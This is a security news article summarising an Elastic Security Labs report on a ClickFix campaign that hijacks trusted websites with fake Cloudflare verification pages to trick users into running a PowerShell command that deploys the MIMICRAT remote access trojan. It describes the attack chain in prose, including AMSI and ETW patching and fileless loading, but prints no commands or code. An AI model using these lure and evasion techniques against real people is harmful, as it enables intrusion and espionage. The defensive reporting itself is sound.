The ‘Human Verification’ Trap: ClickFix Campaign Hijacks Trusted Sites to Deploy MIMICRAT
Ddos 
bincheck.io page source | Elastic Security Labs
Security researchers are sounding the alarm over a highly sophisticated malware campaign that weaponizes human helpfulness to bypass traditional security controls. According to a recent investigation by Elastic Security Labs, a widespread “ClickFix” campaign is actively compromising legitimate websites to deliver a previously unseen and highly capable custom Remote Access Trojan (RAT) dubbed MIMICRAT.
Unlike many modern cyberattacks that rely on brute force or unpatched software vulnerabilities, this campaign relies entirely on social engineering, tricking users into manually executing the malware themselves.
The genius of this campaign lies in its camouflage. The attackers are not utilizing easily identifiable, newly registered malicious domains. Instead, the report highlights that “The campaign’s delivery relies entirely on compromising legitimate, trusted websites rather than attacker-owned infrastructure”.
The attack flow typically begins when a user visits a trusted site, such as a BIN validation service identified by researchers as bincheck[.]io. This site was secretly compromised to load a malicious script from a completely different compromised siteβan Indian mutual fund platform.
This script presents the user with a highly convincing, dynamically localized fake Cloudflare “verification” page. Instead of asking the user to solve a CAPTCHA puzzle, the page instructs them to press Win+R (opening the Windows Run dialog) and paste a command to “fix” a connection issue or prove they are human.
“The lure copies a malicious PowerShell command directly to the victim’s clipboard and prompts them to open a Run dialog (Win+R) or PowerShell prompt and paste it,” the researchers explain. Because the user manually executes the command, “This technique bypasses browser-based download protections entirely, as no file is downloaded”.
Once the victim executes the clipboard command, a devastating, five-stage attack chain kicks off:
- The Obfuscated Downloader: The initial command is an obfuscated PowerShell one-liner that stealthily connects to the attacker’s command-and-control (C2) server to download a more complex script.
- Blinding the Defenses: The second-stage PowerShell script aggressively neutralizes the computer’s built-in security. It patches the Event Tracing for Windows (ETW) to blind logging, and actively patches the Anti-Malware Scan Interface (AMSI) in memory to prevent antivirus software from scanning the subsequent payloads.
- The Lua Loader: With defenses down, a custom Lua 5.4.7 loader is dropped and executed.
- Fileless Shellcode: The Lua loader decrypts embedded shellcode entirely in memory, avoiding writing malicious executables to the hard drive where they might be discovered.
- MIMICRAT Execution: The shellcode reflectively loads the final payload: MIMICRAT.
The deployment of MIMICRAT represents a significant escalation in ClickFix campaigns, which typically deliver simpler, off-the-shelf information stealers.
Elastic Security Labs notes that “Unlike simpler ClickFix deployments that terminate at commodity infostealers, this campaign ends with a capable custom remote access trojan (RAT) we have called MIMICRAT: a native C implant with malleable C2 profiles, token impersonation, SOCKS5 tunneling, and a 22-command dispatch table”.
MIMICRAT is built for deep espionage and persistent control. It communicates with its masters over encrypted HTTPS connections (port 443), utilizing profiles designed to look like benign web analytics traffic to fool network monitors. With its 22 distinct commands, attackers can silently steal files, manipulate running processes, open interactive command shells, and tunnel other malicious traffic through the infected machine using a SOCKS proxy.
Because this campaign relies on tricking the end-user rather than exploiting software, traditional firewalls are often ineffective. Security teams are strongly urged to educate employees about the dangers of the ClickFix methodologyβspecifically, emphasizing that no legitimate website will ever ask a user to open the Windows Run dialog or PowerShell prompt to verify their identity.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
